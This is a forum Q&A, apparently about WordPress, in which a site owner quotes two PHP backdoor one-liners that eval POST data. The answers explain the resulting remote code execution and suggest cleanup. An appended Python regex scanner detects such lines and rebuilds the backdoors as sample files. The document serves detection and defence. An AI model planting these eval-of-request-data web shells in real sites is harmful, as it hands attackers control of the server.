Suspicious Files

Hi, I found two suspicious files on my site:

  1. The first in my theme (404.php), with this line added

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

  2. The second in /wp-admin/ called wp-class.php.

    The only line there was: <?eval($_POST[joao]);?>

Can anyone tell me what these are doing, and what steps should I take?


    1. When someone sends a POST request with a variable php and a base64-encoded value that is PHP code after decoding, that PHP code will run with the permissions of all your own PHP files. The attacker can read all database content, create new users, upload files …

    2. The second code does the same, just without encoding the PHP.

    Both injections are rather primitive; they look almost as if they should be found to make you feel safe when you remove them.

    It is very likely that these snippets are not the only problems. The attacker has probably used his new site and added some files. Read Verifying that I have fully removed a WordPress hack? and follow all suggestions mentioned there.

    Find the back door. Read your log files if they aren’t already compromised.

  1. Those lines of code are almost surely malicious. To hinder the webmaster’s ability to search for strings, malicious content is often hidden in an encoded format, like base64.

    In my experience, the most common version of this attack outputs a hidden iframe that loads an external malicious URL (which may be used for a number of purposes).

    Scan your site with Quttera (internally) and Sucuri (externally) and see if you can identify and remove all instances of the attack.
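As an added example (not part of either answer above, and not code from Quttera, Sucuri or WordPress), here is a small Python scanner that implements the check both answers describe: it walks a WordPress tree and flags every PHP line that passes request data (`$_POST`, `$_GET`, `$_REQUEST`, `$_COOKIE`) into `eval`, either directly or through `base64_decode`. It also covers one variant that is not in the question, an `eval(base64_decode("..."))` with the payload embedded as a long base64 literal, which is the form the second answer's "hidden in an encoded format" remark usually refers to. The sample files it scans are constructed inline from the two snippets in the question plus a clean theme file; the paths and file names are assumptions for the demo only.

```python
"""Scan PHP files for eval-of-request-data backdoors (added example, not the page's own code)."""
import os
import re
import tempfile

# Request-controlled superglobals a backdoor reads its payload from.
SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["

# (finding name, regex). Whitespace and quoting are matched loosely so that
# "eval ( base64_decode ( $_POST ['x'] ) )" is still caught.
PATTERNS = [
    ("eval of base64-decoded request data",
     re.compile(r"\beval\s*\(\s*base64_decode\s*\(\s*" + SUPERGLOBAL, re.I)),
    ("eval of raw request data",
     re.compile(r"\beval\s*\(\s*" + SUPERGLOBAL, re.I)),
    # Variant not in the question: the payload is a long base64 literal in the file itself.
    ("eval of a base64 string literal",
     re.compile(r"\beval\s*\(\s*base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]", re.I)),
]


def scan_php_source(src):
    """Return [(line_no, finding_name, stripped_line)] for every suspicious line in src."""
    findings = []
    for line_no, line in enumerate(src.splitlines(), start=1):
        for name, rx in PATTERNS:
            if rx.search(line):
                findings.append((line_no, name, line.strip()))
    return findings


def scan_directory(root, exts=(".php",)):
    """Walk root, scan every file whose extension is in exts.

    Returns {relative_path: findings} for files with at least one finding.
    Files are read as bytes and decoded leniently so a binary blob cannot abort the scan.
    """
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                src = fh.read().decode("utf-8", errors="replace")
            found = scan_php_source(src)
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


# Constructed sample files for the demo: the two snippets from the question
# (paths assumed), plus a clean theme file that must not be flagged.
SAMPLE_FILES = {
    "wp-content/themes/x/404.php":
        '<?php get_header(); ?>\n'
        '<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>\n',
    "wp-admin/wp-class.php": "<?eval($_POST[joao]);?>\n",
    "wp-content/themes/x/header.php": "<?php wp_head(); ?>\n",
}


def demo():
    """Write the constructed samples to a temp dir, scan it, return {path: [finding names]}."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        hits = scan_directory(tmp)
    # Normalise separators so the result is stable across platforms.
    return {p.replace(os.sep, "/"): [name for _, name, _ in f] for p, f in hits.items()}


if __name__ == "__main__":
    for path, names in sorted(demo().items()):
        print(path)
        for n in names:
            print("   ", n)
```

Point `scan_directory` at the WordPress document root to get a list of files to inspect by hand; a regex scan like this is a triage aid, not proof of a clean site, so combine it with the file-integrity and log-review steps the first answer points to.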